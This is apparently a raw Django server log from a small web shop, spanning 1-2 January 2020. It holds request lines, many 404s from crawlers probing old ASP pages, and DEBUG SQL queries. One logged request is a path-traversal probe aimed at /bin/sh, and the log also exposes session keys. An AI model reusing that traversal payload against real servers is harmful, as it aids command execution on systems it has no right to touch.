'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T19:19:54.929719+00:00'::timestamptz); args=('jp1hoamloni94e652tfdibgxmhz9ubyi', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 19, 19, 54, 929719, tzinfo=)) [01/Jan/2020 19:19:54] "GET /login/?next=/ HTTP/1.0" 200 1786 [01/Jan/2020 19:19:58] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [01/Jan/2020 19:19:59] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 Not Found: /bmxx/Print.asp [01/Jan/2020 19:20:33] "GET /bmxx/Print.asp?ArticleID=352 HTTP/1.0" 404 6367 Not Found: /dtgh/Comment.asp [01/Jan/2020 19:20:41] "GET /dtgh/Comment.asp?ArticleID=504 HTTP/1.0" 404 6373 Not Found: /dyzl/Print.asp [01/Jan/2020 19:20:43] "GET /dyzl/Print.asp?ArticleID=502 HTTP/1.0" 404 6367 [01/Jan/2020 19:21:06] "GET / HTTP/1.0" 302 0 [01/Jan/2020 19:26:09] "GET / HTTP/1.0" 302 0 Not Found: /User/User_Favorite.asp [01/Jan/2020 19:26:48] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=246 HTTP/1.0" 404 6422 [01/Jan/2020 19:33:37] "GET / HTTP/1.0" 302 0 [01/Jan/2020 19:38:40] "GET / HTTP/1.0" 302 0 [01/Jan/2020 19:43:43] "GET / HTTP/1.0" 302 0 [01/Jan/2020 19:48:46] "GET / HTTP/1.0" 302 0 [01/Jan/2020 19:53:49] "GET / HTTP/1.0" 302 0 [01/Jan/2020 19:58:52] "GET / HTTP/1.0" 302 0 Not Found: /xyzx/Print.asp [01/Jan/2020 20:02:24] "GET /xyzx/Print.asp?ArticleID=344 HTTP/1.0" 404 6367 [01/Jan/2020 20:05:03] "GET / HTTP/1.0" 302 0 Not Found: /newslist.asp [01/Jan/2020 20:06:53] "GET /newslist.asp?type=4&id=493 HTTP/1.0" 404 6365 Not Found: /newslist.asp [01/Jan/2020 20:07:26] "GET /newslist.asp?type=4&id=1729 HTTP/1.0" 404 6366 [01/Jan/2020 20:10:05] "GET / HTTP/1.0" 302 0 Not Found: /xyzx/ShowArticle.asp [01/Jan/2020 20:11:51] "GET /xyzx/ShowArticle.asp?ArticleID=511 HTTP/1.0" 404 6385 [01/Jan/2020 20:15:08] "GET / HTTP/1.0" 302 0 [01/Jan/2020 20:23:52] "GET / HTTP/1.0" 302 0 [01/Jan/2020 20:28:55] "GET / HTTP/1.0" 302 0 [01/Jan/2020 20:33:58] "GET / HTTP/1.0" 302 0 Not Found: /xkdh/ShowClass.asp [01/Jan/2020 20:37:41] "GET /xkdh/ShowClass.asp?ClassID=45 HTTP/1.0" 404 6376 [01/Jan/2020 20:39:01] "GET / HTTP/1.0" 302 0 [01/Jan/2020 20:44:03] "GET / HTTP/1.0" 302 0 Not Found: /dyzl/ShowClass.asp [01/Jan/2020 20:44:56] "GET /dyzl/ShowClass.asp?ClassID=22 HTTP/1.0" 404 6376 Not Found: /jspd/ShowArticle.asp [01/Jan/2020 20:46:33] "GET /jspd/ShowArticle.asp?ArticleID=72 HTTP/1.0" 404 6384 [01/Jan/2020 20:49:06] "GET / HTTP/1.0" 302 0 Not Found: /xyzx/ShowArticle.asp [01/Jan/2020 20:51:38] "GET /xyzx/ShowArticle.asp?ArticleID=329 HTTP/1.0" 404 6385 Not Found: /dtgh/ShowArticle.asp [01/Jan/2020 20:52:43] "GET /dtgh/ShowArticle.asp?ArticleID=500 HTTP/1.0" 404 6385 Not Found: /User/User_Favorite.asp [01/Jan/2020 20:53:13] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1005&InfoID=469 HTTP/1.0" 404 6422 [01/Jan/2020 20:55:44] "GET / HTTP/1.0" 302 0 [01/Jan/2020 21:05:02] "GET / HTTP/1.0" 302 0 [01/Jan/2020 21:10:05] "GET / HTTP/1.0" 302 0 [01/Jan/2020 21:15:08] "GET / HTTP/1.0" 302 0 [01/Jan/2020 21:20:10] "GET / HTTP/1.0" 302 0 Not Found: /xsyd/ShowClass.asp [01/Jan/2020 21:21:27] "GET /xsyd/ShowClass.asp?ClassID=32 HTTP/1.0" 404 6376 [01/Jan/2020 21:25:13] "GET / HTTP/1.0" 302 0 Not Found: /aqgl/ShowArticle.asp [01/Jan/2020 21:27:32] "GET /aqgl/ShowArticle.asp?ArticleID=88 HTTP/1.0" 404 6384 Not Found: /xyzx/ShowArticle.asp [01/Jan/2020 21:30:12] "GET /xyzx/ShowArticle.asp?ArticleID=330 HTTP/1.0" 404 6385 [01/Jan/2020 21:30:16] "GET / HTTP/1.0" 302 0 Not Found: /newslist.asp [01/Jan/2020 21:30:25] "GET /newslist.asp?type=1&id=90000 HTTP/1.0" 404 6367 [01/Jan/2020 21:35:19] "GET / HTTP/1.0" 302 0 [01/Jan/2020 21:43:37] "GET / HTTP/1.0" 302 0 [01/Jan/2020 21:44:06] "GET / HTTP/1.0" 302 0 [01/Jan/2020 21:49:09] "GET / HTTP/1.0" 302 0 [01/Jan/2020 21:54:11] "GET / HTTP/1.0" 302 0 [01/Jan/2020 21:59:14] "GET / HTTP/1.0" 302 0 [01/Jan/2020 22:03:22] "GET /jsyd HTTP/1.0" 301 0 Not Found: /dtgh/ShowArticle.asp [01/Jan/2020 22:03:24] "GET /dtgh/ShowArticle.asp?ArticleID=504 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [01/Jan/2020 22:03:27] "GET /xyzx/ShowArticle.asp?ArticleID=277 HTTP/1.0" 404 6385 Not Found: /aqgl/ShowArticle.asp [01/Jan/2020 22:03:29] "GET /aqgl/ShowArticle.asp?ArticleID=240 HTTP/1.0" 404 6385 Not Found: /dyzl/UploadFiles_3009/201701/2017010616001091.jpg [01/Jan/2020 22:04:18] "GET /dyzl/UploadFiles_3009/201701/2017010616001091.jpg HTTP/1.0" 404 6458 Not Found: /jspd/UploadFiles_5886/201404/20140417095823195.jpg [01/Jan/2020 22:04:20] "GET /jspd/UploadFiles_5886/201404/20140417095823195.jpg HTTP/1.0" 404 6461 [01/Jan/2020 22:04:51] "GET / HTTP/1.0" 302 0 [01/Jan/2020 22:10:13] "GET / HTTP/1.0" 302 0 Not Found: /aqgl/ShowArticle.asp [01/Jan/2020 22:11:26] "GET /aqgl/ShowArticle.asp?ArticleID=135 HTTP/1.0" 404 6385 Not Found: /dtgh/Print.asp [01/Jan/2020 22:11:28] "GET /dtgh/Print.asp?ArticleID=504 HTTP/1.0" 404 6367 Not Found: /xsyd/SendMail.asp [01/Jan/2020 22:11:29] "GET /xsyd/SendMail.asp?ArticleID=455 HTTP/1.0" 404 6376 Not Found: /xsyd/ShowArticle.asp [01/Jan/2020 22:11:30] "GET /xsyd/ShowArticle.asp?ArticleID=448 HTTP/1.0" 404 6385 Not Found: /xyzx/Print.asp [01/Jan/2020 22:11:31] "GET /xyzx/Print.asp?ArticleID=484 HTTP/1.0" 404 6367 [01/Jan/2020 22:15:16] "GET / HTTP/1.0" 302 0 [01/Jan/2020 22:20:19] "GET / HTTP/1.0" 302 0 [01/Jan/2020 22:25:22] "GET / HTTP/1.0" 302 0 [01/Jan/2020 22:30:25] "GET / HTTP/1.0" 302 0 [01/Jan/2020 22:35:28] "GET / HTTP/1.0" 302 0 [01/Jan/2020 22:40:31] "GET / HTTP/1.0" 302 0 [01/Jan/2020 22:45:34] "GET / HTTP/1.0" 302 0 [01/Jan/2020 22:50:37] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [01/Jan/2020 22:50:57] "GET /robots.txt HTTP/1.0" 404 6341 Not Found: /dyzl/Print.asp [01/Jan/2020 22:50:59] "GET /dyzl/Print.asp?ArticleID=289 HTTP/1.0" 404 6367 Not Found: /xyzx/SendMail.asp [01/Jan/2020 22:51:01] "GET /xyzx/SendMail.asp?ArticleID=373 HTTP/1.0" 404 6376 [01/Jan/2020 22:55:40] "GET / HTTP/1.0" 302 0 [01/Jan/2020 23:01:53] "GET / HTTP/1.0" 302 0 Not Found: /xsyd/ShowClass.asp [01/Jan/2020 23:05:54] "GET /xsyd/ShowClass.asp?ClassID=31 HTTP/1.0" 404 6376 Not Found: /aqgl/ShowClass.asp [01/Jan/2020 23:06:03] "GET /aqgl/ShowClass.asp?ClassID=7 HTTP/1.0" 404 6375 [01/Jan/2020 23:10:04] "GET / HTTP/1.0" 302 0 Not Found: /bmxx/Comment.asp [01/Jan/2020 23:12:05] "GET /bmxx/Comment.asp?ArticleID=458 HTTP/1.0" 404 6373 [01/Jan/2020 23:12:51] "GET / HTTP/1.0" 302 0 [01/Jan/2020 23:15:07] "GET / HTTP/1.0" 302 0 Not Found: /newslist.asp [01/Jan/2020 23:15:10] "GET /newslist.asp?type=4&id=1090 HTTP/1.0" 404 6366 [01/Jan/2020 23:20:09] "GET / HTTP/1.0" 302 0 [01/Jan/2020 23:25:12] "GET / HTTP/1.0" 302 0 [01/Jan/2020 23:30:14] "GET / HTTP/1.0" 302 0 [01/Jan/2020 23:35:17] "GET / HTTP/1.0" 302 0 [01/Jan/2020 23:37:04] "GET / HTTP/1.0" 302 0 [01/Jan/2020 23:40:19] "GET / HTTP/1.0" 302 0 [01/Jan/2020 23:49:12] "GET / HTTP/1.0" 302 0 [01/Jan/2020 23:49:18] "GET / HTTP/1.0" 302 0 [01/Jan/2020 23:54:21] "GET / HTTP/1.0" 302 0 [02/Jan/2020 00:00:01] "GET / HTTP/1.0" 302 0 [02/Jan/2020 00:05:03] "GET / HTTP/1.0" 302 0 Not Found: /Sdms/ScoreQuery.asp [02/Jan/2020 00:08:10] "GET /Sdms/ScoreQuery.asp HTTP/1.0" 404 6368 [02/Jan/2020 00:10:06] "GET / HTTP/1.0" 302 0 Not Found: /bmxx/ShowClass.asp [02/Jan/2020 00:11:34] "GET /bmxx/ShowClass.asp?ClassID=15 HTTP/1.0" 404 6376 Not Found: /newslist.asp [02/Jan/2020 00:12:40] "GET /newslist.asp?type=1&id=40400 HTTP/1.0" 404 6367 Not Found: /newslist.asp [02/Jan/2020 00:12:42] "GET /newslist.asp?type=4&id=1282 HTTP/1.0" 404 6366 Not Found: /xyzx/ShowArticle.asp [02/Jan/2020 00:13:30] "GET /xyzx/ShowArticle.asp?ArticleID=508 HTTP/1.0" 404 6385 [02/Jan/2020 00:16:47] "GET / HTTP/1.0" 302 0 [02/Jan/2020 00:21:50] "GET / HTTP/1.0" 302 0 [02/Jan/2020 00:26:52] "GET / HTTP/1.0" 302 0 [02/Jan/2020 00:31:55] "GET / HTTP/1.0" 302 0 [02/Jan/2020 00:36:57] "GET / HTTP/1.0" 302 0 [02/Jan/2020 00:42:00] "GET / HTTP/1.0" 302 0 [02/Jan/2020 00:47:03] "GET / HTTP/1.0" 302 0 Not Found: /xyzx/ShowArticle.asp [02/Jan/2020 00:48:06] "GET /xyzx/ShowArticle.asp?ArticleID=256 HTTP/1.0" 404 6385 [02/Jan/2020 00:54:12] "GET / HTTP/1.0" 302 0 Not Found: /xyzx/ShowArticle.asp [02/Jan/2020 00:56:56] "GET /xyzx/ShowArticle.asp?ArticleID=303 HTTP/1.0" 404 6385 Not Found: /newslist.asp [02/Jan/2020 00:57:09] "GET /newslist.asp?type=1&id=40600 HTTP/1.0" 404 6367 Not Found: /newslist.asp [02/Jan/2020 00:57:11] "GET /newslist.asp?type=1&id=80200 HTTP/1.0" 404 6367 Not Found: /newslist.asp [02/Jan/2020 00:57:12] "GET /newslist.asp?type=4&id=1297 HTTP/1.0" 404 6366 Not Found: /newslist.asp [02/Jan/2020 00:57:14] "GET /newslist.asp?type=4&id=1723 HTTP/1.0" 404 6366 Not Found: /newslist.asp [02/Jan/2020 00:57:16] "GET /newslist.asp?type=4&id=1724 HTTP/1.0" 404 6366 Not Found: /User/User_Favorite.asp [02/Jan/2020 00:57:35] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1005&InfoID=250 HTTP/1.0" 404 6422 Not Found: /aqgl/ShowArticle.asp [02/Jan/2020 00:59:11] "GET /aqgl/ShowArticle.asp?ArticleID=238 HTTP/1.0" 404 6385 [02/Jan/2020 01:00:01] "GET / HTTP/1.0" 302 0 Not Found: /. ./. ./. ./. ./bin/sh [02/Jan/2020 01:00:44] "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0" 404 6388 [02/Jan/2020 01:05:03] "GET / HTTP/1.0" 302 0 [02/Jan/2020 01:12:13] "GET / HTTP/1.0" 302 0 [02/Jan/2020 01:20:57] "GET / HTTP/1.0" 302 0 [02/Jan/2020 01:26:00] "GET / HTTP/1.0" 302 0 Not Found: /bmxx/ShowArticle.asp [02/Jan/2020 01:30:47] "GET /bmxx/ShowArticle.asp?ArticleID=18 HTTP/1.0" 404 6384 [02/Jan/2020 01:31:02] "GET / HTTP/1.0" 302 0 Not Found: /xyzx/UploadFiles_7376/201609/2016091212222139.jpg [02/Jan/2020 01:31:31] "GET /xyzx/UploadFiles_7376/201609/2016091212222139.jpg HTTP/1.0" 404 6458 [02/Jan/2020 01:34:25] "GET / HTTP/1.0" 302 0 Not Found: /jspd/ShowArticle.asp [02/Jan/2020 01:34:30] "GET /jspd/ShowArticle.asp?ArticleID=172 HTTP/1.0" 404 6385 [02/Jan/2020 01:36:06] "GET / HTTP/1.0" 302 0 Not Found: /bmxx/Print.asp [02/Jan/2020 01:36:49] "GET /bmxx/Print.asp?ArticleID=458 HTTP/1.0" 404 6367 Not Found: /jspd/ShowArticle.asp [02/Jan/2020 01:36:53] "GET /jspd/ShowArticle.asp?ArticleID=169 HTTP/1.0" 404 6385 Not Found: /newslist.asp [02/Jan/2020 01:39:35] "GET /newslist.asp?type=4&id=1706 HTTP/1.0" 404 6366 [02/Jan/2020 01:41:08] "GET / HTTP/1.0" 302 0 [02/Jan/2020 01:46:49] "GET / HTTP/1.0" 302 0 [02/Jan/2020 01:51:52] "GET / HTTP/1.0" 302 0 [02/Jan/2020 01:56:54] "GET / HTTP/1.0" 302 0 [02/Jan/2020 02:05:03] "GET / HTTP/1.0" 302 0 [02/Jan/2020 02:10:09] "GET / HTTP/1.0" 302 0 Not Found: /bmxx/ShowArticle.asp [02/Jan/2020 02:13:23] "GET /bmxx/ShowArticle.asp?ArticleID=324 HTTP/1.0" 404 6385 Not Found: /dyzl/ShowArticle.asp [02/Jan/2020 02:13:25] "GET /dyzl/ShowArticle.asp?ArticleID=502 HTTP/1.0" 404 6385 DEBUG 2020-01-02 02:13:28,465 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'l7w6l3o18y9hgxzbhwofr513igvrfyud' LIMIT 1; args=('l7w6l3o18y9hgxzbhwofr513igvrfyud',) DEBUG 2020-01-02 02:13:28,468 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('l7w6l3o18y9hgxzbhwofr513igvrfyud', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-16T02:13:28.466051+00:00'::timestamptz); args=('l7w6l3o18y9hgxzbhwofr513igvrfyud', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 16, 2, 13, 28, 466051, tzinfo=)) [02/Jan/2020 02:13:28] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /xyzx/UploadFiles_7376/201509/2015090916023753.rar [02/Jan/2020 02:14:04] "GET /xyzx/UploadFiles_7376/201509/2015090916023753.rar HTTP/1.0" 404 6458 Not Found: /robots.txt [02/Jan/2020 02:14:42] "GET /robots.txt HTTP/1.0" 404 6341 [02/Jan/2020 02:14:42] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-02 02:14:43,236 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'n3kyk043v7258e07hapiphne16l555gs' LIMIT 1; args=('n3kyk043v7258e07hapiphne16l555gs',) DEBUG 2020-01-02 02:14:43,239 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('n3kyk043v7258e07hapiphne16l555gs', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-16T02:14:43.237233+00:00'::timestamptz); args=('n3kyk043v7258e07hapiphne16l555gs', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 16, 2, 14, 43, 237233, tzinfo=)) [02/Jan/2020 02:14:43] "GET /login/?next=/ HTTP/1.0" 200 1786 [02/Jan/2020 02:16:12] "GET /guestbook HTTP/1.0" 301 0 [02/Jan/2020 02:17:32] "GET / HTTP/1.0" 302 0 [02/Jan/2020 02:19:26] "GET / HTTP/1.0" 302 0 [02/Jan/2020 02:20:01] "GET /whm-server-status HTTP/1.0" 301 0 Not Found: /xyzx/ShowArticle.asp [02/Jan/2020 02:21:38] "GET /xyzx/ShowArticle.asp?ArticleID=331 HTTP/1.0" 404 6385 Not Found: /xkdh/ShowClass.asp [02/Jan/2020 02:22:26] "GET /xkdh/ShowClass.asp?ClassID=46 HTTP/1.0" 404 6376 [02/Jan/2020 02:24:29] "GET / HTTP/1.0" 302 0 [02/Jan/2020 02:29:31] "GET / HTTP/1.0" 302 0 [02/Jan/2020 02:35:21] "GET / HTTP/1.0" 302 0 [02/Jan/2020 02:36:37] "GET / HTTP/1.0" 302 0 [02/Jan/2020 02:40:01] "GET /whm-server-status HTTP/1.0" 301 0 Not Found: /clientaccesspolicy.xml [02/Jan/2020 02:41:32] "GET /clientaccesspolicy.xml HTTP/1.0" 404 6376 [02/Jan/2020 02:42:32] "GET / HTTP/1.0" 302 0 [02/Jan/2020 02:47:34] "GET / HTTP/1.0" 302 0 [02/Jan/2020 02:55:22] "GET / HTTP/1.0" 302 0 Not Found: /xsyd/ShowArticle.asp [02/Jan/2020 02:56:13] "GET /xsyd/ShowArticle.asp?ArticleID=391 HTTP/1.0" 404 6385 [02/Jan/2020 03:00:01] "GET /whm-server-status HTTP/1.0" 301 0 Not Found: /xsyd/Comment.asp [02/Jan/2020 03:02:27] "GET /xsyd/Comment.asp?ArticleID=391 HTTP/1.0" 404 6373 Not Found: /xyzx/SendMail.asp [02/Jan/2020 03:02:30] "GET /xyzx/SendMail.asp?ArticleID=264 HTTP/1.0" 404 6376 [02/Jan/2020 03:04:54] "GET / HTTP/1.0" 302 0 [02/Jan/2020 03:05:03] "GET / HTTP/1.0" 302 0 Not Found: /newslist.asp [02/Jan/2020 03:05:47] "GET /newslist.asp?type=1&id=50100 HTTP/1.0" 404 6367 Not Found: /newslist.asp [02/Jan/2020 03:05:50] "GET /newslist.asp?type=4&id=1304 HTTP/1.0" 404 6366 Not Found: /newslist.asp [02/Jan/2020 03:06:02] "GET /newslist.asp?type=5&id=540200 HTTP/1.0" 404 6368 [02/Jan/2020 03:10:05] "GET / HTTP/1.0" 302 0 [02/Jan/2020 03:15:08] "GET / HTTP/1.0" 302 0 [02/Jan/2020 03:15:41] "GET / HTTP/1.0" 302 0 Not Found: /favicon.ico [02/Jan/2020 03:18:17] "GET /favicon.ico HTTP/1.0" 404 6344 [02/Jan/2020 03:20:11] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [02/Jan/2020 03:24:51] "GET /robots.txt HTTP/1.0" 404 6341 [02/Jan/2020 03:24:52] "GET / HTTP/1.0" 302 0 [02/Jan/2020 03:25:14] "GET / HTTP/1.0" 302 0 [02/Jan/2020 03:30:16] "GET / HTTP/1.0" 302 0 [02/Jan/2020 03:36:34] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [02/Jan/2020 03:38:06] "GET /robots.txt HTTP/1.0" 404 6340 [02/Jan/2020 03:38:06] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-02 03:38:07,174 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'dkuzv9wu630usicv2dpsn4b5n6t8k9w3' LIMIT 1; args=('dkuzv9wu630usicv2dpsn4b5n6t8k9w3',) DEBUG 2020-01-02 03:38:07,177 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('dkuzv9wu630usicv2dpsn4b5n6t8k9w3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-16T03:38:07.175469+00:00'::timestamptz); args=('dkuzv9wu630usicv2dpsn4b5n6t8k9w3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 16, 3, 38, 7, 175469, tzinfo=)) [02/Jan/2020 03:38:07] "GET /login/?next=/ HTTP/1.0" 200 1786 [02/Jan/2020 03:41:36] "GET / HTTP/1.0" 302 0 [02/Jan/2020 03:50:54] "GET / HTTP/1.0" 302 0 [02/Jan/2020 03:55:57] "GET / HTTP/1.0" 302 0 [02/Jan/2020 04:05:03] "GET / HTTP/1.0" 302 0 [02/Jan/2020 04:10:05] "GET / HTTP/1.0" 302 0 [02/Jan/2020 04:15:08] "GET / HTTP/1.0" 302 0 [02/Jan/2020 04:20:11] "GET / HTTP/1.0" 302 0 [02/Jan/2020 04:25:01] "GET /whm-server-status HTTP/1.0" 301 0 [02/Jan/2020 04:25:13] "GET / HTTP/1.0" 302 0 [02/Jan/2020 04:34:13] "GET / HTTP/1.0" 302 0 [02/Jan/2020 04:38:22] "GET / HTTP/1.0" 302 0 [02/Jan/2020 04:39:15] "GET / HTTP/1.0" 302 0 [02/Jan/2020 04:44:18] "GET / HTTP/1.0" 302 0 [02/Jan/2020 04:49:21] "GET / HTTP/1.0" 302 0 [02/Jan/2020 04:55:19] "GET / HTTP/1.0" 302 0 [02/Jan/2020 05:00:55] "GET / HTTP/1.0" 302 0 [02/Jan/2020 05:06:11] "GET / HTTP/1.0" 302 0 [02/Jan/2020 05:08:58] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-02 05:08:59,475 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'awsc6mw4ekmd1lsgal5wn3kzdqte5vyo' LIMIT 1; args=('awsc6mw4ekmd1lsgal5wn3kzdqte5vyo',) DEBUG 2020-01-02 05:08:59,478 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('awsc6mw4ekmd1lsgal5wn3kzdqte5vyo', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-16T05:08:59.475889+00:00'::timestamptz); args=('awsc6mw4ekmd1lsgal5wn3kzdqte5vyo', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 16, 5, 8, 59, 475889, tzinfo=)) [02/Jan/2020 05:08:59] "GET /login/?next=/ HTTP/1.0" 200 1786 [02/Jan/2020 05:09:03] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [02/Jan/2020 05:09:04] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [02/Jan/2020 05:09:04] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [02/Jan/2020 05:09:05] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [02/Jan/2020 05:09:50] "GET / HTTP/1.0" 302 0 [02/Jan/2020 05:10:04] "GET / HTTP/1.0" 302 0 [02/Jan/2020 05:15:07] "GET / HTTP/1.0" 302 0 [02/Jan/2020 05:20:10] "GET / HTTP/1.0" 302 0 [02/Jan/2020 05:25:12] "GET / HTTP/1.0" 302 0 [02/Jan/2020 05:30:15] "GET / HTTP/1.0" 302 0 [02/Jan/2020 05:35:18] "GET / HTTP/1.0" 302 0 [02/Jan/2020 05:40:20] "GET / HTTP/1.0" 302 0 [02/Jan/2020 05:45:23] "GET / HTTP/1.0" 302 0 [02/Jan/2020 05:47:54] "GET / HTTP/1.0" 302 0 [02/Jan/2020 05:50:01] "GET /whm-server-status HTTP/1.0" 301 0 [02/Jan/2020 05:50:26] "GET / HTTP/1.0" 302 0 [02/Jan/2020 05:55:29] "GET / HTTP/1.0" 302 0 [02/Jan/2020 06:05:03] "GET / HTTP/1.0" 302 0 [02/Jan/2020 06:08:57] "GET / HTTP/1.0" 302 0 [02/Jan/2020 06:10:14] "GET / HTTP/1.0" 302 0 [02/Jan/2020 06:15:16] "GET / HTTP/1.0" 302 0 [02/Jan/2020 06:24:56] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [02/Jan/2020 06:24:59] "GET /robots.txt HTTP/1.0" 404 6341 Not Found: /dyzl/Print.asp [02/Jan/2020 06:25:01] "GET /dyzl/Print.asp?ArticleID=288 HTTP/1.0" 404 6367 Not Found: /xyzx/SendMail.asp [02/Jan/2020 06:25:03] "GET /xyzx/SendMail.asp?ArticleID=376 HTTP/1.0" 404 6376 [02/Jan/2020 06:29:59] "GET / HTTP/1.0" 302 0 [02/Jan/2020 06:38:42] "GET / HTTP/1.0" 302 0 [02/Jan/2020 06:39:38] "GET / HTTP/1.0" 302 0 [02/Jan/2020 06:44:41] "GET / HTTP/1.0" 302 0 [02/Jan/2020 06:49:43] "GET / HTTP/1.0" 302 0 [02/Jan/2020 06:54:46] "GET / HTTP/1.0" 302 0 [02/Jan/2020 06:57:45] "OPTIONS / HTTP/1.0" 302 0 [02/Jan/2020 06:59:48] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-02 07:02:08,018 utils 2749 140297233225472 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2020-01-02 07:02:08,025 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2020-01-02 07:02:08,029 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2020-01-02 07:02:08,032 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2020-01-02 07:02:08,039 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2020-01-02 07:02:08,044 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2020-01-02 07:02:08,048 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2020-01-02 07:02:08,052 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2020-01-02 07:02:08,056 utils 2749 140297233225472 (0.001) 